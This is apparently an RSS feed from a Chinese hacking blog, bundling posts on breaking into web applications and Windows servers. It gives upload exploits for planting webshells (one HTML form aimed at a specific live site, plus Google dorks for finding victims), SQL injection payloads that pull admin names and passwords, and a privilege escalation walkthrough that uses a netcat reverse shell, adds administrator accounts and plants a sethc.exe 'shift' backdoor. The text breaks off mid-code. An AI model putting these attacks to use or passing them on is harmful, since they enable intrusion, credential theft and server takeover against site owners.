<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0">
<channel>
<title><![CDATA[GuLang's Blog]]></title>
<link>http://www.0354hk.com/</link>
<description><![CDATA[创造机会的人是勇者；等待机会的人是愚者]]></description>
<language>zh-cn</language>
<copyright><![CDATA[Copyright 2005 PBlog3 v2.8]]></copyright>
<webMaster><![CDATA[chenliangsx@gmail.com(孤_狼)]]></webMaster>
<generator>PBlog2 v2.4</generator> 
<image>
	<title>GuLang&#39;s Blog</title>
	<url>http://www.0354hk.com/images/logos.gif</url>
	<link>http://www.0354hk.com/</link>
	<description>GuLang&#39;s Blog</description>
</image>

			<item>
			<link>http://www.0354hk.com/article.asp?id=479</link>
			<title><![CDATA[DEDECMS后台另类拿Shell方法（图）]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Thu,29 Jul 2010 23:59:23 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=479</guid>
		<description><![CDATA[在拿下DEDE后台账号密码的时候，社工或者什么的<br/>DEDE后台能直接上传PHP文件，他是传到uploads目录了，当遇到下面的情况时<br/><a target="_blank" href="http://www.176ku.com/anquan/UploadFiles_3093/201007/2010072619375639.jpg" rel="external"><br/><img src="http://hiphotos.baidu.com/5427518/pic/item/3f364758c97319c0810a18a6.jpg" border="0" alt=""/><br/> </a><br/>那就利用模板上传的功能得Shell，在模板那里新建一个HTM文件，或者上传一个<br/><a target="_blank" href="http://www.176ku.com/anquan/UploadFiles_3093/201007/2010072619382212.jpg" rel="external"><br/><img src="http://hiphotos.baidu.com/5427518/pic/item/6f0bfa8187c66c99bd3e1ea6.jpg" border="0" alt=""/><br/> </a><br/>然后保存，到生成首页文件那里，把上面改成你修改上传的HTM文件，下面改后缀为PHP之后就生成<br/><a target="_blank" href="http://www.176ku.com/anquan/UploadFiles_3093/201007/2010072619384993.jpg" rel="external"><br/><img src="http://hiphotos.baidu.com/5427518/pic/item/1f8a27353836f7caa71e12a6.jpg" border="0" alt=""/><br/> </a><br/><a target="_blank" href="http://www.176ku.com/anquan/UploadFiles_3093/201007/2010072619390011.jpg" rel="external"><br/><img src="http://hiphotos.baidu.com/5427518/pic/item/904e148babd2dd92fc1f10a6.jpg" border="0" alt=""/><br/> </a><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=478</link>
			<title><![CDATA[Z-BLOG后台getshell方法]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Thu,29 Jul 2010 23:58:30 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=478</guid>
		<description><![CDATA[Z-BLOG后台利用插件拿WEBSHELL<br/>怎么进后台自己想办法，进入后台<br/>插件管理--TotoroⅡ插件，导出此插件，下载本地利用文本形式打开<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/dc8af109c4c4f28e3ac7638b.jpg" border="0" alt=""/><br/>base64加密的<br/>PCVAIENPREVQQUdFPTY1MDAxICU+DQo8JQ0KJy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v<br/>Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8N<br/>CicvLyDmj5Lku7blupTnlKg6ICAgIFotQmxvZyAxLjcNCicvLyDmj5Lku7bliLbkvZw6ICAg<br/>IA0KJy8vIOWkhyAgICDms6g6ICAgIA0KJy8vIOacgOWQjuS/ruaUue+8miAgIA0KJy8vIOac<br/>gOWQjueJiOacrDogICAgDQonLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8v<br/>Ly8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLy8vLw0KJT4NCjwlIE9w<br/>dGlvbiBFeHBsaWNpdCAlPg0KPCUgT24gRXJyb3IgUmVzdW1lIE5leHQgJT4NCjwlIFJlc3Bv<br/>bnNlLkNoYXJzZXQ9IlVURi04IiAlPg0KPCUgUmVzcG9uc2UuQnVmZmVyPVRydWUgJT4NCjwh<br/>LS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vY19vcHRpb24uYXNwIiAtLT4NCjwhLS0gI2luY2x1<br/>ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19mdW5jdGlvbi5hc3AiIC0tPg0KPCEtLSAjaW5j<br/>bHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX2Z1bmN0aW9uX21kNS5hc3AiIC0tPg0KPCEt<br/>LSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9saWIuYXNwIiAtLT4N<br/>CjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vZnVuY3Rpb24vY19zeXN0ZW1fYmFzZS5hc3Ai<br/>IC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3RlbV9ldmVu<br/>dC5hc3AiIC0tPg0KPCEtLSAjaW5jbHVkZSBmaWxlPSIuLi8uLi9mdW5jdGlvbi9jX3N5c3Rl<br/>bV9wbHVnaW4uYXNwIiAtLT4NCjwhLS0gI2luY2x1ZGUgZmlsZT0iLi4vLi4vcGx1Z2luL3Bf<br/>Y29uZmlnLmFzcCIgLS0+DQo8JQ0KDQpDYWxsIFN5c3RlbV9Jbml0aWFsaXplKCkNCg0KJ+aj<br/>gOafpemdnuazlemTvuaOpQ0KQ2FsbCBDaGVja1JlZmVyZW5jZSgiIikNCg0KJ+ajgOafpead<br/>g+mZkA0KSWYgQmxvZ1VzZXIuTGV2ZWw+MSBUaGVuIENhbGwgU2hvd0Vycm9yKDYpIA0KDQpJ<br/>ZiBDaGVja1BsdWdpblN0YXRlKCJUb3Rvcm8iKT1GYWxzZSBUaGVuIENhbGwgU2hvd0Vycm9y<br/>KDQ4KQ0KJT4NCjwlDQoNCkRpbSBhY3QsZGVsaWQNCmFjdD1SZXF1ZXN0LkZvcm0oImFjdCIp<br/>DQpkZWxpZD1SZXF1ZXN0LkZvcm0oImlkIikNCkRpbSBzdHJDb250ZW50DQpEaW0gc3RyWkNf<br/>VE9UT1JPX0JBRFdPUkRfTElTVCxTdHJUTVAsTkVXX0JBRFdPUkQsYm9sVE9UT1JPX0RFTF9E<br/>SVJFQ1RMWQ0Kc3RyQ29udGVudD1Mb2FkRnJvbUZpbGUoQmxvZ1BhdGggJiAiL1BMVUdJTi90<br/>b3Rvcm8vaW5jbHVkZS5hc3AiLCJ1dGYtOCIpDQpDYWxsIExvYWRWYWx1ZUZvclNldHRpbmco<br/>c3RyQ29udGVudCxUcnVlLCJTdHJpbmciLCJUT1RPUk9fQkFEV09SRF9MSVNUIixzdHJaQ19U<br/>T1RPUk9fQkFEV09SRF9MSVNUKQ0KQ2FsbCBMb2FkVmFsdWVGb3JTZXR0aW5nKHN0ckNvbnRl<br/>bnQsVHJ1ZSwiQm9vbGVhbiIsIlRPVE9ST19ERUxfRElSRUNUTFkiLGJvbFRPVE9ST19ERUxf<br/>RElSRUNUTFkpDQpJZiBhY3Q9ImRlbGNtIiB0aGVuDQoNCglEaW0gb2JqQ29tbWVudA0KCVNl<br/>dCBvYmpDb21tZW50PU5ldyBUQ29tbWVudA0KCUlmIG9iakNvbW1lbnQuTG9hZEluZm9ieUlE<br/>KGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hlY2tTdHIob2JqQ29tbWVudC5I<br/>b21lUGFnZSAmICJ8IiAmIG9iakNvbW1lbnQuQ29udGVudCxzdHJaQ19UT1RPUk9fQkFEV09S<br/>RF9MSVNUKQ0KCQlzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNUPXN0clpDX1RPVE9ST19CQURX<br/>T1JEX0xJU1QgJiBTdHJUTVANCgkJTkVXX0JBRFdPUkQ9U3RyVE1QDQoJCVJlc3BvbnNlLldy<br/>aXRlIFRvdG9yb19kZWFsSXQob2JqQ29tbWVudCxib2xUT1RPUk9fREVMX0RJUkVDVExZKQ0K<br/>DQoJRW5kIElmCQkNCgkJDQpFbHNlaWYgYWN0PSJkZWx0YiIgdGhlbg0KDQoJRGltIG9ialRy<br/>YWNrQmFjaw0KCVNldCBvYmpUcmFja0JhY2s9TmV3IFRUcmFja0JhY2sNCglJZiBvYmpUcmFj<br/>a0JhY2suTG9hZEluZm9ieUlEKGRlbGlkKSBUaGVuDQoJDQoJCVN0clRNUD1UT1RPUk9fY2hl<br/>Y2tTdHIob2JqVHJhY2tCYWNrLlVSTCAmICJ8IiAmIG9ialRyYWNrQmFjay5FeGNlcnB0LHN0<br/>clpDX1RPVE9ST19CQURXT1JEX0xJU1QpDQoJCXN0clpDX1RPVE9ST19CQURXT1JEX0xJU1Q9<br/>c3RyWkNfVE9UT1JPX0JBRFdPUkRfTElTVCAmIFN0clRNUA0KCQlORVdfQkFEV09SRD1TdHJU<br/>TVANCgkJUmVzcG9uc2UuV3JpdGUgVG90b3JvX2RlYWxJdChvYmpUcmFja0JhY2ssYm9sVE9U<br/>T1JPX0RFTF9ESVJFQ1RMWSkNCgkNCglFbmQgSWYNCgkNCkVuZCBJZg0KDQpJZiBsZWZ0KHN0<br/>clpDX1RPVE9ST19CQURXT1JEX0xJU1QsMSk9InwiIHRoZW4gc3RyWkNfVE9UT1JPX0JBRFdP<br/>UkRfTElTVD1SaWdodChzdHJaQ19UT1RPUk9fQkFEV09SRF9MSVNULCBMZW4oc3RyWkNfVE9U<br/>T1JPX0JBRFdPUkRfTElTVCkgLSAxKQ0KQ2FsbCBTYXZlVmFsdWVGb3JTZXR0aW5nKHN0ckNv<br/>bnRlbnQsVHJ1ZSwiU3RyaW5nIiwiVE9UT1JPX0JBRFdPUkRfTElTVCIsc3RyWkNfVE9UT1JP<br/>X0JBRFdPUkRfTElTVCkNCkNhbGwgU2F2ZVRvRmlsZShCbG9nUGF0aCAmICIvUExVR0lOL3Rv<br/>dG9yby9pbmNsdWRlLmFzcCIsc3RyQ29udGVudCwidXRmLTgiLEZhbHNlKQ0KJ0lmIE5FV19C<br/>QURXT1JEPD4iIiBUaGVuIFJlc3BvbnNlLndyaXRlICIsVG90b3Jv4oWh5paw5aKe5LiL5YiX<br/>6buR6K+N77yaICIgJiBSaWdodChORVdfQkFEV09SRCwgTGVuKE5FV19CQURXT1JEKSAtIDEp<br/>DQoNCiU+DQo8JQ0KRnVuY3Rpb24gVE9UT1JPX2NoZWNrU3RyKHN0clRvQ2hlY2ssQkFEV09S<br/>RF9MSVNUKQ0KCQlEaW0gb2JqUmVnLG9iak1hdGNoZXMsTWF0Y2gNCgkJU2V0IG9ialJlZyA9<br/>IE5ldyBSZWdFeHANCgkJb2JqUmVnLklnbm9yZUNhc2UgPSBUcnVlDQoJCW9ialJlZy5HbG9i<br/>YWwgPSBUcnVlDQoJCW9ialJlZy5QYXR0ZXJuID0gImh0dHA6Ly8oW1x3LV0rXC4pK1tcdy1d<br/>KyINCgkJU2V0IG9iak1hdGNoZXMgPSBvYmpSZWcuRXhlY3V0ZShzdHJUb0NoZWNrKQ0KCQlG<br/>b3IgRWFjaCBNYXRjaCBJbiBvYmpNYXRjaGVzDQoJCQlJZiBUb3Rvcm9fY2hlY2tOZXdCYWRX<br/>b3JkKE1hdGNoLlZhbHVlLEJBRFdPUkRfTElTVCAmIFRPVE9ST19jaGVja1N0cikgdGhlbg0K<br/>CQkJCVRPVE9ST19jaGVja1N0cj1UT1RPUk9fY2hlY2tTdHIgJiAifCIgJiBSaWdodChNYXRj<br/>aC5WYWx1ZSwgTGVuKE1hdGNoLlZhbHVlKSAtIDcpDQoJCQlFbmQgaWYNCgkJTmV4dA0KCQlT<br/>ZXQgb2JqUmVnID0gTm90aGluZw0KCQlTZXQgb2JqTWF0Y2hlcyA9IE5vdGhpbmcNCgkJU2V0<br/>IE1hdGNoID0gTm90aGluZw0KRW5kIEZ1bmN0aW9uDQoNCkZ1bmN0aW9uIFRvdG9yb19jaGVj<br/>a05ld0JhZFdvcmQoY29udGVudCxCQURXT1JEX0xJU1QpDQoNCglUb3Rvcm9fY2hlY2tOZXdC<br/>YWRXb3JkPVRydWUNCglEaW0gaSxqDQoJaj0wDQogICAgRGltIHN0ckZpbHRlcg0KICAgIHN0<br/>ckZpbHRlciA9IFNwbGl0KEJBRFdPUkRfTElTVCwgInwiKQ0KCUZvciBpID0gMCBUbyBVQm91<br/>bmQoc3RyRmlsdGVyKQ0KCQlJZiBzdHJGaWx0ZXIoaSk8PiIiIFRoZW4NCgkJCUlmIEluU3Ry<br/>IChMQ2FzZShjb250ZW50KSwgTENhc2Uoc3RyRmlsdGVyKGkpKSkgPiAwIFRoZW4NCgkJCQlU<br/>b3Rvcm9fY2hlY2tOZXdCYWRXb3JkPUZhbHNlDQoJCQkJRXhpdCBGb3INCgkJCUVuZCBJZg0K<br/>CQlFbmQgSWYNCiAgICBOZXh0DQoNCkVuZCBGdW5jdGlvbg0KDQoNCkZ1bmN0aW9uIFRvdG9y<br/>b19kZWFsSXQob2JqVG9EZWFsLGJvbERlbCkNCg0KCURpbSBsb2dJZA0KCWxvZ0lkPW9ialRv<br/>RGVhbC5sb2dfSUQNCg0KCUlmIGJvbERlbCBUaGVuDQoJCUlmIG9ialRvRGVhbC5EZWwoKSBU<br/>aGVuIFRvdG9yb19kZWFsSXQgPSAi5Yig6Zmk5oiQ5YqfIg0KCUVsc2UNCgkJb2JqVG9EZWFs<br/>LmxvZ19JRD0tMS1vYmpUb0RlYWwubG9nX0lEDQoJCUlmIG9ialRvRGVhbC5Qb3N0IFRoZW4g<br/>VG90b3JvX2RlYWxJdCA9ICLlt7LliqDlhaXlrqHmoLgiDQoJRW5kIElmDQoJDQoJQ2FsbCBC<br/>dWlsZEFydGljbGUobG9nSWQsRmFsc2UsRmFsc2UpDQoJQ2FsbCBTZXRCbG9nSGludChOdWxs<br/>LFRydWUsTnVsbCkNCglTZXQgb2JqVG9EZWFsID0gTm90aGluZwkNCgkNCkVuZCBGdW5jdGlv<br/>bg0KJT4=<br/>自己用一句话或小马去base64加密下替换之，修改Totoro/ajaxdel.asp文件名，再进后台删了这个插件重新上传安装下，你的SHELL地址就是PLUGIN/Totoro/xxxx.asp了]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=477</link>
			<title><![CDATA[利用Shift后门提权入侵服务器方法]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[技术文章]]></category>
			<pubDate>Thu,29 Jul 2010 23:57:41 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=477</guid>
		<description><![CDATA[提权时要到的工具如下：cmd.exe Churrasco.exe nc.exe<br/>用以上工具先要确定SHELL里 wscript.shell 命令行执行组件是否可用!如不能用用以下方法进行调用!如调用也不行!那么就请你另想办法!<br/>代码如下：<br/><span style="color:#ff0000">&nbsp;&nbsp;&nbsp;&nbsp; <br/> <br/>&nbsp;&nbsp;&nbsp;&nbsp; <br/></span><br/>　　将以上代码保存为cmd.asp上传到SHELL里 再访问这个CMD.asp如没有出错等就说明可以执行CMD命令!<br/>　　下面先来将Churrasco.exe怎么用才能更好的发挥它的作用!有很多朋友问我为什么我上传的Churrasco.exe执行命令时没有出现命令成功 原因有几种这里我就不多说了!那么这时我们要想到Churrasco.exe行命令时没有出现命令成功 但出现/churrasco/--&gt;Current User: NETWORK SERVICE<br/>　　/churrasco/--&gt;Getting Rpcss PID ...<br/>　　/churrasco/--&gt;Found Rpcss PID: 696<br/>　　/churrasco/--&gt;Searching for Rpcss threads ...<br/>　　/churrasco/--&gt;Found Thread: 444<br/>　　/churrasco/--&gt;Thread not impersonating, looking for another thread...<br/>　　/churrasco/--&gt;Found Thread: 700<br/>　　/churrasco/--&gt;Thread not impersonating, looking for another thread...<br/>　　/churrasco/--&gt;Found Thread: 704<br/>　　/churrasco/--&gt;Thread not impersonating, looking for another thread...<br/>　　/churrasco/--&gt;Found Thread: 712<br/>　　/churrasco/--&gt;Thread impersonating, got NETWORK SERVICE Token: 0xf24<br/>　　/churrasco/--&gt;Getting SYSTEM token from Rpcss Service...<br/>　　/churrasco/--&gt;Found szywjs Token<br/>　　/churrasco/--&gt;Found SYSTEM token 0xf1c<br/>　　/churrasco/--&gt;Running command with SYSTEM Token...<br/>　　直到这里 没有出现命令执行成功 那么这时你千万不要放弃!离成功加差一步!这里你就用NC进行反弹一个CMDSHELL看下如果反弹回来的CMDSHELL权限很大的话那我就不用说了!如果说权限很小的这里你也有很大的希望了!<br/>　　在反弹回来的CMDSHELL里执行 C:\RECYCLER\Churrasco.exe &#34;net user iisuser iisuser /add”<br/>　　C:\RECYCLER\Churrasco.exe &#34;net localgroup administrators iisuser /add&#34;<br/>　　C:\RECYCLER\Churrasco.exe 这里是你所传到的目录!这样可以说90%的出现命令执行成功!这样就可以进行3389连接了!<br/>　　如果说这时没有出现命令执行成功 下面我就再告诉你一种方法!<br/>　　如下 依次执行：<br/>　　attrib c:\windows\system32\sethc.exe -h -r -s<br/>　　attrib c:\windows\system32\dllcache\sethc.exe -h -r -s<br/>　　del c:\windows\system32\sethc.exe<br/>　　copy c:\windows\explorer.exe c:\windows\system32\sethc.exe<br/>　　copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe<br/>　　attrib c:\windows\system32\sethc.exe +h +r +s<br/>　　attrib c:\windows\system32\dllcache\sethc.exe +h +r +s<br/>　　如果出现拒绝等错误 那就没法了!如果说这台服务器先是被别人拿过了做了shift后门 那么就是100%成功!本人亲自用这方法成功替换过别人带有密码的SHIFT后门!<br/>　　还有一点就是在webSHELL里或CMDSHELL下也可以这样执行!<br/>　　C:\RECYCLER\Churrasco.exe &#34;copy d:\windows\explorer.exe d:\windows\system32\sethc.exe&#34;<br/>　　C:\RECYCLER\Churrasco.exe &#34;copy d:\windows\system32\sethc.exe d:\windows\system32\dllcache\sethc.exe &#34;<br/>　　还有就是attrib 加属性等也可以这样执行!还有一点忘了就是在反弹回来的CMDSHELL里用这种方法也可以!<br/>　　这样就可以利用SHIft后门成功拿下服务器了]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=476</link>
			<title><![CDATA[PHP168 V6.02 鸡肋漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:25:52 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=476</guid>
		<description><![CDATA[无意间发现个 PHP168 V6.02的 BUG<br/>跟之前那个 job 下载任意文件性质差不多<br/>只不过这次是把任意文件再拷贝为一份jpg出来！附加一个爆路<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/f91b320fe973daacaa64571a.jpg" border="0" alt=""/><br/>漏洞文件出现在 “do/cutimg.php”<br/>if($action==&#34;cutimg&#34;){<br/>$NewPic=str_replace($webdb[www_url],&#34;&#34;,$uploadfile);<br/>$NewPic=PHP168_PATH.$NewPic;<br/>include(PHP168_PATH.&#34;inc/waterimage.php&#34;);<br/>if($nextpic<br/>虽然无法直接拿shell，但是对渗透又多了一条路可走~~<br/>利用方法<br/><img src="http://hiphotos.baidu.com/5427518/pic/item/f5fa04588481929f9d82041a.jpg" border="0" alt=""/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=475</link>
			<title><![CDATA[华速网游交易平台oday]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:24:41 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=475</guid>
		<description><![CDATA[程序：华速网游交易平台 <br/>漏洞说明:上传，暴库 <br/>google关键字: inurl:list_buy.asp?class_1<br/><br/>EXP测试：<br/>（复制代码保存为html文件）<br/><br/><br/><br/>&lt;html&gt;<br/>&lt;head&gt;<br/>&lt;meta http-equiv=&#34;Content-Type&#34; content=&#34;text/html; charset=gb2312&#34;&gt;<br/>&lt;link href=&#34;css/manage.css&#34; rel=&#34;stylesheet&#34; type=&#34;text/css&#34;&gt;<br/>&lt;/head&gt;<br/>&lt;body&gt;<br/>&lt;form name=&#34;form1&#34; method=&#34;post&#34; action=&#34;<a href="http://hsgame.hs173.cn/upfile.asp" target="_blank" rel="external">http://hsgame.hs173.cn/upfile.asp</a>&#34; enctype=&#34;multipart/form-data&#34; &gt;<br/>&lt;div id=&#34;esave&#34; style=&#34;position:absolute; top:18px; left:40px; z-index:10; visibility:hidden&#34;&gt; <br/>&lt;TABLE WIDTH=340 BORDER=0 CELLSPACING=0 CELLPADDING=0&gt;<br/>&lt;TR&gt;&lt;td width=20%&gt;&lt;/td&gt;<br/>&lt;TD bgcolor=#ff0000 width=&#34;60%&#34;&gt; <br/>&lt;TABLE WIDTH=100% height=120 BORDER=0 CELLSPACING=1 CELLPADDING=0&gt;<br/>&lt;TR&gt; <br/>&lt;td bgcolor=#ffffff align=center&gt;&lt;font color=red&gt;正在上传文件，请稍候...&lt;/font&gt;&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;/table&gt;<br/>&lt;/td&gt;&lt;td width=20%&gt;&lt;/td&gt;<br/>&lt;/tr&gt;&lt;/table&gt;&lt;/div&gt;<br/>&lt;table class=&#34;tableBorder&#34; width=&#34;90%&#34; border=&#34;0&#34; align=&#34;center&#34; cellpadding=&#34;3&#34; cellspacing=&#34;1&#34; bgcolor=&#34;#FFFFFF&#34;&gt;<br/>&lt;tr&gt; <br/>&lt;td align=&#34;center&#34;&gt;&lt;b&gt;&lt;font color=&#34;#ffffff&#34;&gt;图片上传 <br/>&lt;input type=&#34;hidden&#34; name=&#34;filepath&#34; value=&#34;/a.asp;aa&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;filelx&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;EditName&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;FormName&#34; value=&#34;&#34;&gt;<br/>&lt;input type=&#34;hidden&#34; name=&#34;act&#34; value=&#34;uploadfile&#34;&gt;&lt;/font&gt;&lt;/b&gt;<br/>&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;tr &gt; <br/>&lt;td align=&#34;center&#34; id=&#34;upid&#34; height=&#34;80&#34;&gt;选择文件: <br/>&lt;input type=&#34;file&#34; name=&#34;file1&#34; size=&#34;40&#34; class=&#34;tx1&#34; value=&#34;&#34;&gt;<br/>&lt;input class=btn type=&#34;submit&#34; name=&#34;Submit&#34; value=&#34;开始上传&#34; class=&#34;button&#34; onClick=&#34;javascript:mysub()&#34;&gt;<br/>&lt;/td&gt;<br/>&lt;/tr&gt;<br/>&lt;/table&gt;<br/>&lt;/form&gt;<br/>&lt;/body&gt;<br/>&lt;/html&gt;<br/><br/><br/>上传完毕，右键查看源码，上传的马就在根目录之下。<br/>如果上传不了的话，把&lt;input type=&#34;hidden&#34; name=&#34;filepath&#34; value=&#34;/a.asp;aa&#34;&gt;的value的值修改为“/upfile/a.asp;aaa”，图片目录应该是可写的。<br/><br/><br/>google关键字: inurl:list_buy.asp?class_1<br/><br/><br/>如果上传失效的话，可以直接访问inc/config.asp文件，暴出数据库地址，进后台拿shell。<br/><br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=474</link>
			<title><![CDATA[ECMall 2.2 app/groupbuy.app.php 延迟注射漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sat,24 Jul 2010 21:23:46 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=474</guid>
		<description><![CDATA[代码分析<br/>ECMall 社区电子商务系统(简称ECMall)是上海商派网络科技有限公司继ECShop 之后推出的又一个电子商务姊妹产品app\groupbuy.app.php:26:function index(){$id = empty($_GET[&#39;&#39;id&#39;&#39;]) ? 0 : $_GET[&#39;&#39;id&#39;&#39;];&nbsp;&nbsp;//id未过滤if (!$id){$this-&gt;show_warning(‘no_such_groupbuy’);return false;}// 团购信息$group = $this-&gt;_groupbuy_mod-&gt;get(array(‘conditions’ =&gt; ‘group_id=’ . $id . ‘ AND gb.state&lt;&gt;’ . GROUP_PENDING,&nbsp;&nbsp; //好的，进去了！！‘join’ =&gt; ‘belong_store’,‘fields’ =&gt; ‘gb.*,s.owner_name’));if (empty($group))&nbsp;&nbsp;&nbsp;&nbsp;//很多时候根本没有团购信息，所以是延迟注射了{$this-&gt;show_warning(‘no_such_groupbuy’);return;}<br/><br/>测试方法<br/>【sitedir.com.cn】<br/>本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!/index.php?app=groupbuy&amp;act=index&amp;id=2 and if((sel&#101;ct ascii(mid(user_name,1,1)) from ecm_member wh&#101;re user_id=1)=97,Benchmark(3000000,md5(1)),1)%23/index.php?app=groupbuy&amp;act=index&amp;id=2%20and%20if((sel&#101;ct%20length(password)%20from%20ecm_member%20wh&#101;re%20user_id=1)=32,benchmark(1000000,md5(1)),1)–<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=473</link>
			<title><![CDATA[v5shop 网上商城系统oday]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sun,18 Jul 2010 12:51:45 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=473</guid>
		<description><![CDATA[漏洞文件：cart.aspx&nbsp;&nbsp; <br/><br/>关键字：services.aspxid=&nbsp;&nbsp;<br/>inurl:scoreindex.aspx&nbsp;&nbsp;<br/><br/>默认后台地址：weblogin/Login.aspx <br/><br/>以下是测试EXP：<br/><br/>cart.aspx?act=buy&amp;id=1 and (Sel&#101;ct Top 1 char(124)%2BisNull(cast([Name] as varchar(8000)),char(32))%2Bchar(124)%2BisNull(cast([Pass] as varchar(8000)),char(32))%2Bchar(124) From (Sel&#101;ct Top 4 [Name],[Pass] From [Web_Admin] Wh&#101;re 1=1 o&#114;der by [Name],[Pass]) T o&#114;der by [Name] desc,[Pass] desc)&gt;0 --<br/><br/><br/><br/>weblogin/System_Config_Operate.aspx&nbsp;&nbsp;<br/>后台上传水印.可以直接上传大马.&nbsp;&nbsp;<br/><br/><br/>非安全中国安全建议：<br/>目前官方没有发布相关补丁或升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本<br/>www.v5shop.com.cn&nbsp;&nbsp;（官网网站）<br/>临时修复方法，把cart.aspx临时改名<br/>文章转载自『非安全中国网』地址: <a href="http://www.sitedir.com.cn/exploit-1231.html" target="_blank" rel="external">http://www.sitedir.com.cn/exploit-1231.html</a>]]></description>
		</item>
		
			<item>
			<link>http://www.0354hk.com/article.asp?id=472</link>
			<title><![CDATA[织梦(Dedecms)V5.6远程文件删除漏洞]]></title>
			<author>chenliangsx@gmail.com(admin)</author>
			<category><![CDATA[漏洞相关]]></category>
			<pubDate>Sun,18 Jul 2010 12:50:49 +0800</pubDate>
			<guid>http://www.0354hk.com/default.asp?id=472</guid>
		<description><![CDATA[影响版本:DedeCmsV5.6<br/>漏洞描述:<br/>DedeCMS内容管理系统软件采用XML名字空间风格核心模板：模板全部使用文件形式保存，对用户设计模板、网站升级转移均提供很大的便利，健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。<br/>漏洞文件：edit_face.php<br/><br/>else if($dopost==&#39;&#39;delold&#39;&#39;)&nbsp;&nbsp;//45行<br/>{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(empty($oldface))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ShowMsg(&#34;没有可删除的头像！&#34;, &#34;-1&#34;);<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;exit();<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$userdir = $cfg_user_dir.&#39;&#39;/&#39;&#39;.$cfg_ml-&gt;M_ID;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(!ereg(&#39;&#39;^&#39;&#39;.$userdir, $oldface))<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;{<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$oldface = &#39;&#39;&#39;&#39;;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;}<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;if(eregi(&#34;\.(jpg|gif|png)$&#34;, $oldface) &amp;&amp; 